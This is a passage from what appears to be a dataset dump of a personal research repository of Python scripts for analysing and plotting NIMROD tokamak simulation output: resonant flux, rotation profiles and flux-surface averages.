If not, only record the step number. 
It\nthen calls surfmn routines to plot the data and record the reconnected flux'''\n\ndef pickle_sort(file):\n print(file[6:])\n return int(file[6:])\n\ndef get_dumptime(thisfile):\n ''' Open an hdf5 file and read the dump time\n if I can't open file return None\n '''\n time=None\n with h5py.File(thisfile, 'r') as h5file:\n try:\n time=h5file[\"dumpTime\"].attrs['vsTime']\n except:\n print(f\"No dumpTime in dumpfile {thisfile}\")\n raise\n return time\n\ndef find_files(thisdir):\n ''' This fuction finds the surfmn, dump files in the directory\n input: thisdir\n output: surfmn filename, dumpfilename, stepnumber, step time\n the outputs return None, if a file does not exists\n '''\n surfmn_file=None\n dumpfile=None\n stepnumber=None\n steptime=None\n nimrodin=None\n listobjs = os.listdir(thisdir)\n for iobj in listobjs:\n wordlist = iobj.split('.')\n if (wordlist[0].lower()=='dumpgll'):\n if (dumpfile==None):\n dumpfile=thisdir+'/'+iobj\n thisstep=int(wordlist[1])\n if (stepnumber==None):\n stepnumber=thisstep\n elif (stepnumber!=thisstep):\n print(f\"Dump step does not match surfmn step\")\n raise\n steptime=get_dumptime(dumpfile)\n else:\n print(f\"Multiple dumpfiles in directory {thisdir}\")\n raise\n elif (wordlist[0].lower()=='surfmn'):\n if (surfmn_file==None):\n surfmn_file=thisdir+'/'+iobj\n thisstep=int(wordlist[1])\n if (stepnumber==None):\n stepnumber=thisstep\n elif (stepnumber!=thisstep):\n print(f\"Surfmn step does not match dump step\")\n raise\n else:\n print(f\"Multiple surfmn files in directory {thisdir}\")\n raise\n elif (iobj=='nimrod.in'):\n nimrodin=thisdir+'/'+iobj\n\n\n return surfmn_file, dumpfile, stepnumber, steptime, nimrodin\n\ndef time_hist(steplist):\n print(len(steplist))\n time=np.zeros(len(steplist))\n psi21=np.zeros(len(steplist))\n psi31=np.zeros(len(steplist))\n psi41=np.zeros(len(steplist))\n psi32=np.zeros(len(steplist))\n psi43=np.zeros(len(steplist))\n psi54=np.zeros(len(steplist))\n psi65=np.zeros(len(steplist))\n exb21=np.zeros(len(steplist))\n exb31=np.zeros(len(steplist))\n exb32=np.zeros(len(steplist))\n exb43=np.zeros(len(steplist))\n exb54=np.zeros(len(steplist))\n mlist=[-1,-2,-3,-4]\n qlist=[-1,-2,-3,-4]\n for istep,step in enumerate(steplist):\n print(istep,step.step, step.time)\n time[istep]=step.time\n if step.surfmn_data==False:\n step.read_surfmn()\n if step.profdata==False:\n try:\n os.mkdir('tempprofile')\n except:\n print(\"tempprofile directoy exists\")\n copy2(step.dumpfile,'./tempprofile')\n copy2(step.nimrodin,'./tempprofile')\n os.chdir('tempprofile')\n step.get_profiles()\n for iobj in os.listdir('.'):\n os.remove(iobj)\n os.chdir('../')\n os.rmdir('tempprofile')\n# fig = plt.figure(figsize=(6,5))\n# ax=fig.add_subplot(111)\n# plt.plot(step.profs.rhon,step.profs.omegator)\n# plt.title(r\"fsa\",fontsize=16)\n# plt.ylabel(r'nd ',fontsize=16)\n# plt.xlabel(r'rho',fontsize=16)\n# plt.tight_layout()\n# plt.show()\n psi21[istep]=step.get_resonance(\"psi\",1,-2)\n psi31[istep]=step.get_resonance(\"psi\",1,-3)\n psi41[istep]=step.get_resonance(\"psi\",1,-4)\n psi43[istep]=step.get_resonance(\"psi\",3,-4)\n psi32[istep]=step.get_resonance(\"psi\",2,-3)\n psi54[istep]=step.get_resonance(\"psi\",4,-5)\n psi65[istep]=step.get_resonance(\"psi\",5,-6)\n this_q=step.profs.get_rho_q(q=-2)\n exb21[istep]=step.profs.get_omega_exb(n=1,rhon=this_q)/(2*np.pi)\n this_q=step.profs.get_rho_q(q=-3)\n exb31[istep]=step.profs.get_omega_exb(n=1,rhon=this_q)/(2*np.pi)\n this_q=step.profs.get_rho_q(q=-1.5)\n 
exb32[istep]=step.profs.get_omega_exb(n=1,rhon=this_q)/(2*np.pi)\n this_q=step.profs.get_rho_q(q=-4/3)\n exb43[istep]=step.profs.get_omega_exb(n=1,rhon=this_q)/(2*np.pi)\n this_q=step.profs.get_rho_q(q=-5/4)\n exb54[istep]=step.profs.get_omega_exb(n=1,rhon=this_q)/(2*np.pi)\n if step.step in [16000]:#[10000,18680,28000,66000,96000]:\n# if step.time>0: #avoids issues if no pertubation\n this_exb=step.profs.get_omega_exb(n=1)\n this_rho_21=step.profs.get_rho_q(q=-2)\n\n fig = plt.figure(figsize=(6,5))\n ax=fig.add_subplot(111)\n plt.plot(step.profs.rhon,this_exb/(2*np.pi))\n plt.title(r\"fsa\",fontsize=16)\n plt.ylabel(r'f_exb ',fontsize=16)\n plt.xlabel(r'rho',fontsize=16)\n ax.axvline(this_rho_21,ls=':')\n plt.tight_layout()\n plt.show()\n step.plot_surfmn(\"psi\",1,**{\"scale\":1000})\n step.plot_surfmn(\"psi\",2,**{\"scale\":1000})\n step.plot_surfmn(\"psi\",3,**{\"scale\":1000})\n step.plot_surfmn(\"psi\",4,**{\"scale\":1000})\n step.plot_surfmn(\"psi\",5,**{\"scale\":1000})\n step.plot_radial(\"psi\",1,mlist,**{\"scale\":1,\"qlist\":qlist})\n\n fig = plt.figure(figsize=(6,5))\n ax=fig.add_subplot(111)\n plt.plot(time*1000,psi21*1000)\n plt.title(r\"$\\psi$ 2/1\",fontsize=16)\n plt.ylabel(r'$\\psi$ [mWb] ',fontsize=16)\n plt.xlabel(r't [ms]',fontsize=16)\n plt.show()\n fig = plt.figure(figsize=(6,5))\n ax=fig.add_subplot(111)\n plt.plot(time*1000,psi31*1000)\n plt.title(r\"$\\psi$ 3/1\",fontsize=16)\n plt.ylabel(r'$\\psi$ [mWb] ',fontsize=16)\n plt.xlabel(r't [ms]',fontsize=16)\n plt.show()\n fig = plt.figure(figsize=(6,5))\n ax=fig.add_subplot(111)\n plt.plot(time*1000,psi41*1000)\n plt.title(r\"$\\psi$ 4/1\",fontsize=16)\n plt.ylabel(r'$\\psi$ [mWb] ',fontsize=16)\n plt.xlabel(r't [ms]',fontsize=16)\n plt.show()\n fig = plt.figure(figsize=(6,5))\n ax=fig.add_subplot(111)\n plt.plot(time*1000,psi43*1000)\n plt.title(r\"$\\psi$ 4/3\",fontsize=16)\n plt.ylabel(r'$\\psi$ [mWb] ',fontsize=16)\n plt.xlabel(r't [ms]',fontsize=16)\n plt.show()\n fig = plt.figure(figsize=(6,5))\n ax=fig.add_subplot(111)\n plt.plot(time*1000,psi32*1000)\n plt.title(r\"$\\psi$ 3/2\",fontsize=16)\n plt.ylabel(r'$\\psi$ [mWb] ',fontsize=16)\n plt.xlabel(r't [ms]',fontsize=16)\n plt.show()\n fig = plt.figure(figsize=(6,5))\n ax=fig.add_subplot(111)\n plt.plot(time*1000,psi54*1000)\n plt.title(r\"$\\psi$ 5/4\",fontsize=16)\n plt.ylabel(r'$\\psi$ [mWb] ',fontsize=16)\n plt.xlabel(r't [ms]',fontsize=16)\n plt.show()\n fig = plt.figure(figsize=(6,5))\n ax=fig.add_subplot(111)\n plt.plot(time*1000,psi65*1000)\n plt.title(r\"$\\psi$ 6/5\",fontsize=16)\n plt.ylabel(r'$\\psi$ [mWb] ',fontsize=16)\n plt.xlabel(r't [ms]',fontsize=16)\n plt.show()\n fig = plt.figure(figsize=(6,5))\n ax=fig.add_subplot(111)\n plt.plot(time*1000,psi21*1000,label=\"2/1\")\n plt.plot(time*1000,psi31*1000,label=\"3/1\")\n plt.plot(time*1000,psi32*1000,label=\"3/2\")\n plt.plot(time*1000,psi43*1000,label=\"4/3\")\n plt.plot(time*1000,psi54*1000,label=\"5/4\")\n plt.plot(time*1000,psi65*1000,label=\"6/5\")\n ax.legend(loc=0)\n plt.title(r\"$\\psi$\",fontsize=16)\n plt.ylabel(r'$\\psi$ [mWb] ',fontsize=16)\n plt.xlabel(r't [ms]',fontsize=16)\n plt.show()\n fig = plt.figure(figsize=(6,5))\n ax=fig.add_subplot(111)\n plt.plot(time*1000,np.abs(exb21)/1000)\n plt.title(r\"$f_{eb}$ 2/1\",fontsize=16)\n plt.ylabel(r'f [kHz] ',fontsize=16)\n plt.xlabel(r't [ms]',fontsize=16)\n plt.tight_layout()\n plt.show()\n fig = plt.figure(figsize=(6,5))\n ax=fig.add_subplot(111)\n plt.plot(time*1000,np.abs(exb54)/1000,label=\"5/4\")\n 
plt.plot(time*1000,np.abs(exb43)/1000,label=\"4/3\")\n plt.plot(time*1000,np.abs(exb32)/1000,label=\"3/2\")\n plt.plot(time*1000,np.abs(exb21)/1000,label=\"2/1\")\n plt.title(r\"Mode Rotation Frequency / n\",fontsize=16)\n plt.ylabel(r'f [kHz] ',fontsize=16)\n plt.xlabel(r't [ms]',fontsize=16)\n plt.legend(loc=\"best\")\n plt.ylim(0,3)\n plt.tight_layout()\n plt.show()\n# for istep in steplist:\n\ndef surfmn_runner(show_plot=True,pickle_data=False,read_pickle=False):\n ''' main runner for surfmn\n loops over all objects in a directory\n checks to see if the objects are a directory\n if so, then searches that directoy for a dump file and surfmn file'''\n steplist=[]\n read_new = True\n if read_pickle:\n pickle_list=glob.glob(\"pickle*\")\n pickle_list.sort(key=pickle_sort)\n if len(pickle_list)>0:\n read_new=False\n for iobj in pickle_list:\n with open(iobj,'rb') as file:\n step=surfmnstep.SurfmnStep(None, None, None, None, None)\n step.load(file)\n steplist.append(step)\n# steplist.append(pickle.load(open(iobj, \"rb\" )))\n if read_new==True:\n workdir=os.getcwd()\n listobjs = os.listdir(workdir)\n listobjs.sort()\n for iobj in listobjs:\n if os.path.isdir(iobj):\n thisdir=workdir+'/'+iobj\n surfmn_file, dump, step, time, nimrodin = find_files(thisdir)\n steplist.append(surfmnstep.SurfmnStep(surfmn_file, dump, step, time,nimrodin))\n if show_plot:\n time_hist(steplist)\n if pickle_data:\n for step in steplist:\n if step==None:\n continue\n if step.surfmn_data==False:\n step.read_surfmn()\n if step.profdata==False:\n try:\n os.mkdir('tempprofile')\n except:\n print(\"tempprofile directoy exists\")\n copy2(step.dumpfile,'./tempprofile')\n copy2(step.nimrodin,'./tempprofile')\n os.chdir('tempprofile')\n step.get_profiles()\n for iobj in os.listdir('.'):\n os.remove(iobj)\n os.chdir('../')\n os.rmdir('tempprofile')\n filename=\"pickle\"+str(step.step).zfill(5)\n with open(filename,'wb') as file:\n step.dump(file)\n# pickle.dump(step,open(filename,'wb'))\n\n# steplist[1].read_surfmn()\n# print(steplist[1].get_resonance(\"psi\",1,-2))\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Surfmn runner.')\n parser.add_argument('--plot', action='store_true',help='shows plots')\n parser.add_argument('--pickle', action='store_true',help='pickle data')\n parser.add_argument('--read', '-r', action='store_true',help='read pickled data')\n args = vars(parser.parse_args())\n surfmn_runner(show_plot=args['plot'],pickle_data=args['pickle'],read_pickle=args['read'])\n" }, { "alpha_fraction": 0.6221896409988403, "alphanum_fraction": 0.69159334897995, "avg_line_length": 27.02739715576172, "blob_id": "b15a9d4d609e69fffcd2ad13a59b59574654633d", "content_id": "f42cee4b76064ad65f32545b3f97934b14ccc6f0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2046, "license_type": "no_license", "max_line_length": 68, "num_lines": 73, "path": "/plotingScripts/eqfsa.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport h5py\n\nhomeDir = os.environ['HOME']\nscratchPath= \"/SCRATCH/174446_novac_debug/eq28/\"\nscratchPath=\"/SCRATCH/166439/03300_fgnimeq_q104_reorder_temp/\"\nfileName = \"eqfsa.h5\"\n\nfullFile = homeDir + scratchPath + fileName\n\nfontSize=16\neqNames = ['q',r'$\\lambda$','beq2','nd','ti','te','pi','pe']\neqNames += [r'$\\omega$','kpol']\npsiName = [r'$\\psi$']\nfc=h5py.File(fullFile, 
'r')\n\nprint(fc['prof'].shape)\ndata=np.zeros(fc['prof'].shape)\nfor ii in range(fc['prof'].shape[0]):\n for jj in range(fc['prof'].shape[1]):\n data[ii,jj] =fc['prof'][ii,jj]\n\npsi=np.zeros(fc['psi'].shape)\nfor ii in range(fc['psi'].shape[0]):\n psi[ii]=fc['psi'][ii]\n\nfig=plt.figure(figsize=(6,8))\n\n#fig.subplots_adjust(left=0.5)\n#ax.yaxis.labelpad=35\nax = fig.add_subplot(311)\nax.plot(psi,abs(data[0,:]))\nax.hlines(1.0,0,1,linestyle='dotted')\nax.axvline(0.637122,ls='-',c='k')\nplt.xlim(0.0,1.0)\nplt.ylabel(eqNames[0],fontsize=fontSize, rotation=90)\nplt.title(\"Saftey Factor\",fontsize=fontSize)\nax = fig.add_subplot(312)\nax.plot(psi,abs(data[1,:]))\nplt.xlim(0.0,1.0)\nax.axvline(0.637122,ls='-',c='k')\nplt.ylabel(eqNames[1]+r' $(m^{-1})$',fontsize=fontSize, rotation=90)\nplt.title(\"Parallel Current\",fontsize=fontSize)\nax = fig.add_subplot(313)\nax.plot(psi,abs(data[8,:]/1000))\nplt.xlim(0.0,1.0)\nax.axvline(0.637122,ls='-',c='k')\nplt.xlabel(psiName[0],fontsize=fontSize)\nplt.ylabel(eqNames[8]+r' (krad/s)',fontsize=fontSize, rotation=90)\nplt.title(\"Rotation Profile\",fontsize=fontSize)\nax.hlines(0.0,0,1,linestyle='solid')\nplt.tight_layout()\nplt.show()\n\nfig=plt.figure(figsize=(4,4))\n\n#fig.subplots_adjust(left=0.5)\n#ax.yaxis.labelpad=35\nax = fig.add_subplot(111)\nax.plot(psi,data[8,:]/1000)\nplt.xlim(0.0,1.05)\n#ax.axvline(0.637122,ls='-',c='k')\nplt.xlabel(psiName[0],fontsize=fontSize)\nplt.ylabel(eqNames[8]+r' (kiloR/s)',fontsize=fontSize, rotation=90)\nplt.title(\"Rotation Profile\",fontsize=fontSize)\nax.hlines(0.0,0,1.05,linestyle='solid')\nplt.tight_layout()\nplt.show()\nprint(eqNames)\n" }, { "alpha_fraction": 0.6031610369682312, "alphanum_fraction": 0.6191798448562622, "avg_line_length": 28.262500762939453, "blob_id": "fdc2debbcda34f74f157d9260d2291e0b1296b07", "content_id": "023dfb56293df6a407db285a7c63c9a70b78d468", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4682, "license_type": "no_license", "max_line_length": 114, "num_lines": 160, "path": "/ntmscripts/ntm_tmp.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n#\n#profiles is a class for calculating 1D profiles\n# using the flux surface integration\n#\n#\nimport os\nimport h5py\n#import surfmnstep\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport argparse\nimport pickle\nimport glob\nfrom shutil import copy2\nimport ntm_step_real as step\nimport nim_timer as timer\n\n#import fsa_surfmn as surfmn\nimport matplotlib.colors as mcolors\n\n\n\n\ndef ntm_tmp(file_name=None,show_plot=True,pickle_data=False,\\\n read_pickle=False,args=[]):\n if not os.path.isfile(file_name):\n print(f\"File {file_name} not found\")\n raise IOError\n\n dump_pre=[\"dumpgll\",\"dump\"]\n dump_suf=[\"h5\"]\n pickle_pre=[\"ntm\"]\n pickle_suf=[\"pickle\"]\n nimrodin=\"nimrod.in\"\n pre=file_name.split('.')[0]\n if pre in dump_pre:\n print(f\"Performing ntm analysis from dump file\")\n # check for nimrod.in and hdf5 format\n if not os.path.isfile(nimrodin):\n print(f\"nimrod.in not found\")\n raise IOError\n if not file_name.split('.')[-1] in dump_suf:\n print(f\"dump file is not hdf5 format\")\n raise IOError\n ### todo\n nsurf=args.get(\"nsurf\",150)\n fargs={}\n eqflag=args.get(\"eqflag\",1)\n mmax=args.get(\"mmax\",10)\n nmax=args.get(\"nmax\",5)\n nmodes=args.get('nmodes',-1)\n if nmodes <1 or nmodes>nmax :\n fargs['ifour']=list(range(1,nmax+1))\n else:\n start=nmax-nmodes+1\n 
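# when a subset is requested, keep only the nmodes highest toroidal harmonics\n            # (n = nmax-nmodes+1 .. nmax); the branch above keeps n = 1 .. nmax\n            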
fargs['ifour']=list(range(start,nmax+1))\n fargs['mmax']=mmax\n # timer=nim_timer.nimTimer()\n ntm=step.ntmstep(file_name,nimrodin)\n print(\"After ntmstep\")\n ntm.get_dumptime()\n print(\"After dumptime\")\n ntm.fields.set_method(\"induction\")\n method='rad'\n if method=='rad':\n ntm.analyze_radial()\n else:\n ntm.analyze()\n\n\n # ntm.calculate_psi(rzo=np.array(args['rzo']),nsurf=nsurf,fargs=fargs)\n # raise\n #\n\n# ntm.calculate_induction(rzo=np.array(args['rzo']),nsurf=nsurf,fargs=fargs)\n# timer.timer.print_times()\n# ntm.plot_fsa_phase(key=None)\n #raise\n #ntm.analyze()\n\n #raise ValueError\n #ntm.get_domain()\n #ntm.eval_plot()\n # initalize surfmn object\n # surf=surfmn.fsasurfmn(file_name,nimrodin)\n # surf.get_dumptime()\n # rzo=np.array(args.get(\"rzo\",[1.768,-0.018831,0.0]))\n # nsurf=args.get(\"nsurf\",150)\n # fargs={}\n # eqflag=args.get(\"eqflag\",1)\n # mmax=args.get(\"mmax\",10)\n # nmax=args.get(\"nmax\",5)\n # nmodes=args.get('nmodes',-1)\n # if nmodes <1 or nmodes>nmax :\n # fargs['ifour']=list(range(1,nmax+1))\n # else:\n # start=nmax-nmodes+1\n # fargs['ifour']=list(range(start,nmax+1))\n # fargs['mmax']=mmax\n # surf.calculate(rzo=rzo,nsurf=nsurf,eqflag=eqflag,fargs=fargs)\n\n #pickle data here\n if args['pickle']:\n pfile=pickle_pre[0]+'.'+str(ntm.step).zfill(5)+'.'+pickle_suf[0]\n print(f\"writing file {pfile}\")\n with open(pfile,'wb') as file:\n ntm.dump(file)\n elif pre in pickle_pre:\n print(\"pickle_pre\")\n ntm=step.ntmstep(None,None)\n ntm.load(file_name)\n print(f\"Time: {ntm.time}\" )\n #ntm.plot_fsa_phase(key=None)\n # with open(file_name,'rb') as file:\n # surf=surfmn.fsasurfmn(None,None)\n # surf.load(file)\n else:\n print(f\"File {file_name} is not a recognized file type\")\n raise IOError\n\n #plot data here\n if args['plot']:\n ntm.plot_fsa_phase(key=None,time=ntm.time)\n # surf.plot()\n pass\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='NTM runner.')\n parser.add_argument('file',help='file name')\n parser.add_argument('--plot', action='store_true',help='shows plots')\n parser.add_argument('--pickle', action='store_true',help='pickle data')\n parser.add_argument('--read', '-r', action='store_true',help='read pickled data')\n parser.add_argument('--mmax',type=int,default=15,help=\"max poloidal mode number\")\n parser.add_argument('--nmax',type=int,default=5, help=\"max toroidal mode number\")\n parser.add_argument('--nmodes', type=int, default=-1, \\\n help=\"number of toroidal modes, defualt goes from 1 to nmax\")\n parser.add_argument('--rzo',type=float, nargs=3, default=[1.768,-0.018831,0.0], help=\"intial guess for o-point\")\n parser.add_argument('--nsurf', type=int, default=150, help=\"number of surfaces\")\n parser.add_argument('--eqflag', type=int, default=1, help=\"flag to add n=0 perturbation to eq\")\n args = vars(parser.parse_args())\n print(args)\n ntm_tmp(file_name=args['file'],show_plot=args['plot'],\\\n pickle_data=args['pickle'],read_pickle=args['read'],args=args)\n" }, { "alpha_fraction": 0.4990439713001251, "alphanum_fraction": 0.5583174228668213, "avg_line_length": 16.931034088134766, "blob_id": "6a1f103e1741ef8e81ca5943732793690742b5b5", "content_id": "6ac78aaa0738984c243c66729aa1fd223a4ac463", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 523, "license_type": "no_license", "max_line_length": 66, "num_lines": 29, "path": "/diiidNim/startPositions.py", "repo_name": "echowell/nimrodscripts", 
"src_encoding": "UTF-8", "text": "import numpy as np\n\n\n\nr_m = 1.750\nz_m = 2.537e-2\n\na=0.567\nkappa=1.829\n\n\nppc = 25\ncords = 4\n\nnpts = ppc * cords\n\n\nphi = 0.0\nf1=open(\"start_positions.dat\",'w',)\nprint npts\nf1.write(str(npts)+'\\n')\nfor it in np.linspace(0,2*np.pi,cords,endpoint=False):\n for ir in np.linspace(1.0,0,ppc,endpoint=False):\n thisZ = z_m + ir * kappa * a * np.sin(it)\n thisR = r_m + ir * a * np.cos(it)\n print thisR,'\\b,', thisZ, '\\b,', phi\n f1.write( str(thisR)+', '+ str(thisZ)+ ', '+ str(phi)+'\\n')\n \nf1.close() " }, { "alpha_fraction": 0.7546699643135071, "alphanum_fraction": 0.7571606636047363, "avg_line_length": 56.42856979370117, "blob_id": "42a87170f2c2c360f2d9d15ad7b3055b426704a8", "content_id": "dc0293ab5f5bcc2b7761aafaece814c93bb5f05e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 803, "license_type": "no_license", "max_line_length": 103, "num_lines": 14, "path": "/README.md", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "## NIMSCRIPTS\nA collection of scripts that are part of my NIMROD workflow. \n\n### NIMROD \nInformation on the NIMROD code can be found at the official [NIMROD website](https://nimrodteam.org/)\n\n### Scripts\n - **combineDump** Combines the Fourier components in multiple dump files. \n - **trip2Nim:** Convert trip3D external magnetic field data to NIMROD readable format.\n - **surfmnNim:** Generates surface mn plots from nimrod output files. Originally developed by Matt Beidler. \n - **diiidNim:** A collection of scripts that are useful for simulations of DIII-D experiments.\n - **plotingScripts:** A collection of scripts for plotting nimrod output in matplotlib.\n - **bilderScripts:** Scripts that I use when running builder on my mac\n - **nimflSeed:** Generate a random collection of points for seeding NIMFL" }, { "alpha_fraction": 0.5354412198066711, "alphanum_fraction": 0.5875301957130432, "avg_line_length": 39.46506881713867, "blob_id": "fd19b6981f05dcb3f050c90db4343ad5b632f854", "content_id": "92c4864a77a1506d995d1c0cde90e122ca767bec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 20273, "license_type": "no_license", "max_line_length": 139, "num_lines": 501, "path": "/random/muPlots.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\nfrom plot_nimrod import PlotNimrod as pn\nimport f90nml\nfrom eval_nimrod import *\nfrom field_class import *\nfrom fsa import *\n#from particle import *\nimport matplotlib.pyplot as pl\nfrom scipy.interpolate import interp1d,splev,UnivariateSpline\nimport os\n#import pfileReader\n\ndef readRaw(rawFile):\n datadict={}\n with open(rawFile, 'r') as f:\n while True:\n dataname = f.readline()\n if not dataname:\n break\n dataname = dataname.split()\n datalen = int(dataname[0])\n dataname = dataname[2]\n npdata=numpy.zeros((3,datalen),numpy.float)\n for line in range(datalen):\n datastr=f.readline().split()\n npdata[0][line]=float(datastr[0])\n npdata[1][line]=float(datastr[1])\n npdata[2][line]=float(datastr[2])\n datadict[dataname]=npdata\n return datadict\n\n# load dump file\ndumpfile = 'dumpgll.00000.h5'\nnml = f90nml.read('nimrod.in')\ngmt = nml['grid_input']['geom']\nif gmt == 'tor':\n gmt=True\nelse:\n gmt=False\neval_nimrod = EvalNimrod(dumpfile, fieldlist='nvptbj') #, (e not in dumpfile coord='xyz')\nprint(\"After eval nimrod\")\n\n#%# read sol.grn and prepare plots\n#%Rsol = 
numpy.loadtxt('sol.grn', skiprows=1, max_rows=1)\n#%Zsol = numpy.loadtxt('sol.grn', skiprows=3, max_rows=1)\n#%Rsep = numpy.loadtxt('sol.grn', skiprows=5, max_rows=1)\n#%Zsep = numpy.loadtxt('sol.grn', skiprows=7, max_rows=1)\n#%Rwall = numpy.loadtxt('sol.grn', skiprows=9, max_rows=1)\n#%Zwall = numpy.loadtxt('sol.grn', skiprows=11, max_rows=1)\n#%Rwall = numpy.append(Rwall,Rwall[0])\n#%Zwall = numpy.append(Zwall,Zwall[0])\nrzo = find_pf_null(eval_nimrod, [1.7, -0.2, 0])\n#%def setBdryPlot():\n#% fig, ax = pl.subplots()\n#% fig.set_size_inches(8,12)\n#% ax.plot(Rsol[:],Zsol[:],color='k')\n#% ax.plot(Rsep[:],Zsep[:],color='k')\n#% ax.plot(Rwall[:],Zwall[:],color='k')\n#% ax.set(ylabel=\"Z (m)\", xlabel=\"R (m)\")\n#% ax.ticklabel_format(axis='both', style='sci', scilimits=(10**3,10**-3),\n#% useOffset=None, useLocale=None, useMathText=True)\n#% pl.tight_layout()\n#% # find o-point\n#% ax.plot(rzo[0],rzo[1],'o')\n#% return ax\n#%def contourContains(rcon,zcon,rr,zz):\n#% intersections = 0\n#% for ii in range(rcon.size):\n#% if (zcon[ii]-zz)*(zcon[ii-1]-zz)<0. or zcon[ii]-zz==0.:\n#% if rcon[ii]>rr and rcon[ii-1]>rr:\n#% intersections += 1\n#% elif rcon[ii]<rr and rcon[ii-1]<rr:\n#% continue\n#% else:\n#% if rcon[ii]>rcon[ii-1]:\n#% if (rr-rcon[ii-1])/(rcon[ii]-rcon[ii-1]) \\\n#% +(zz-zcon[ii])/(zcon[ii-1]-zcon[ii]) < 1.e-8:\n#% intersections += 1\n#% else:\n#% if (rr-rcon[ii])/(rcon[ii-1]-rcon[ii]) \\\n#% +(zz-zcon[ii-1])/(zcon[ii]-zcon[ii-1]) < 1.e-8:\n#% intersections += 1\n#% if intersections%2 == 0:\n#% return False\n#% else:\n#% return True\n#%\n\nmd=3.3435860e-27\n#%zc=6\n#%mc=1.9944235e-26\nechrg=1.609e-19\nkboltz=echrg\nkb=1.609e-19\neps0=8.85418782e-12\n#%\nnsurf = 150 # FSA surfaces\nbextrema = numpy.zeros([2,nsurf])\nbextrema[0,:] = numpy.inf # min\nbextrema[1,:] = -numpy.inf # max\nbigr = numpy.zeros([nsurf])\nbigr[:] = -numpy.inf # max\n#%\n# Do FSA\ndef basefsa(rzc, y, dy, eval_nimrod, fdict):\n '''\n Flux surface averge quantities (f/bdgrth where y[2]=1/bdgrth)\n Set neq to number of outputs in FSA call\n and fill dy[4:4+neq]\n '''\n isurf=fdict.get('isurf')\n n = eval_nimrod.eval_field('n', rzc, dmode=0, eq=2)\n dy[4] = n[0]*dy[2] # ne\n dy[5] = dy[4] # nd #### n is not a vector for me\n if eval_nimrod.ndnq>1:\n dy[6] = n[2]*dy[2] # nc\n else:\n dy[6] = 0.\n ti = eval_nimrod.eval_field('ti', rzc, dmode=0, eq=2)\n dy[7] = ti[0]*dy[2] # ti\n te = eval_nimrod.eval_field('te', rzc, dmode=0, eq=2)\n dy[8] = te[0]*dy[2] # te\n bf = eval_nimrod.eval_field('b', rzc, dmode=1, eq=2)\n B = Vector(bf, rzc, torgeom=gmt, dmod=1)\n bsq = B.dot(B,dmod=0).data\n dy[9] = bsq*dy[2] # B**2\n dy[10] = (B.hat(dmod=0).dot(grad(B.mag())).data)**2*dy[2] # (b.grad(|B|))**2\n dy[11] = rzc[0]*bf[2]*dy[2] # R B_Phi\n bmag = numpy.sqrt(bsq)\n bextrema[0,isurf] = min(bextrema[0,isurf], bmag)\n bextrema[1,isurf] = max(bextrema[1,isurf], bmag)\n bigr[isurf] = max(bigr[isurf], rzc[0])\n vf = eval_nimrod.eval_field('v', rzc, dmode=0, eq=2)\n dy[12] = vf[2]*dy[2]/rzc[0] # omega\n dy[13] = (vf[0]*bf[0]+vf[1]*bf[1])*dy[2]/numpy.sqrt(bf[0]*bf[0]+bf[1]*bf[1]) # Kpol\n return dy\n#%\ndpow=1.0\nfsafilename = 'fsa.npz'\nif os.path.exists(fsafilename):\n fsaDict = numpy.load(fsafilename)\n dvar = fsaDict['arr_0']\n yvars = fsaDict['arr_1']\n contours = fsaDict['arr_2']\n bextrema = fsaDict['arr_3']\n bigr = fsaDict['arr_4']\nelse:\n dvar, yvars, contours = FSA(eval_nimrod, rzo, basefsa, 10, nsurf=nsurf, \\\n depvar='eta', dpow=dpow, rzx=[1.3, -1.14, 0])\n fsaArr = [dvar, yvars, contours, bextrema, bigr]\n 
numpy.savez(fsafilename,*fsaArr)\n\n# Determine where the FSA failed\niend=-1\nwhile numpy.isnan(yvars[:,iend]).any():\n iend -= 1\niend += yvars.shape[1]+1\n#%\n# Do FSA for f_passing\ndef trapfsa(rzc, y, dy, eval_nimrod, isurf):\n '''\n Flux surface averge quantities (f/bdgrth where y[2]=1/bdgrth)\n Set neq to number of outputs in FSA call\n and fill dy[4:4+neq]\n '''\n bf = eval_nimrod.eval_field('b', rzc, dmode=0, eq=2)\n B = Vector(bf, rzc, torgeom=gmt, dmod=0)\n bmag = B.mag().data\n dy[4:4+nlam] = numpy.sqrt(1.0 - lam[:]*bmag/bave)\n dy[4+nlam:4+2*nlam] = dy[2]/(dy[4:4+nlam])\n dy[4:4+nlam] *= dy[2]\n dy[4+2*nlam] = dy[2]*bmag/bave\n dy[4+2*nlam+1] = dy[2]*numpy.sqrt((rzc[0]-rzo[0])**2+(rzc[1]-rzo[1])**2)\n return dy\n#%\ntrapfilename = 'trap.npz'\nif os.path.exists(trapfilename):\n trapDict = numpy.load(trapfilename)\n f_pass = trapDict['arr_0']\n eps = trapDict['arr_1']\nelse:\n # Arrays for passing/trapped fractions\n # ind 0 - Helander and Sigmar Eq. 11.24\n # f_t = 1 - (3/4)*int_0^(Bave/Bmax) dlambda lambda/<SQRT(1-lambda*B/Bave)>\n # ind 1 - Lin-Liu and Miller (1995)\n # f_tl = 1 - (3/4)*int_0^(Bave/Bmax) dlambda lambda*<1/SQRT(1-lambda*B/Bave)>\n # ind 2 - f_tu from Lin-Liu and Miller (1995)\n # f_tu = 1 - (3/4)*int_0^(Bave/Bmax) dlambda lambda/SQRT(1-lambda*<B/Bave>)\n # int 3 - f_te from inverse aspect ratio as in B5\n # f_c ~ 1 - 1.46*sqrt(eps) + 0.46*eps*sqrt(eps)\n f_pass = numpy.zeros([4,iend])\n eps = numpy.zeros([iend])\n # integrate from 0 to bmax\n for ii in range(iend):\n nlam = 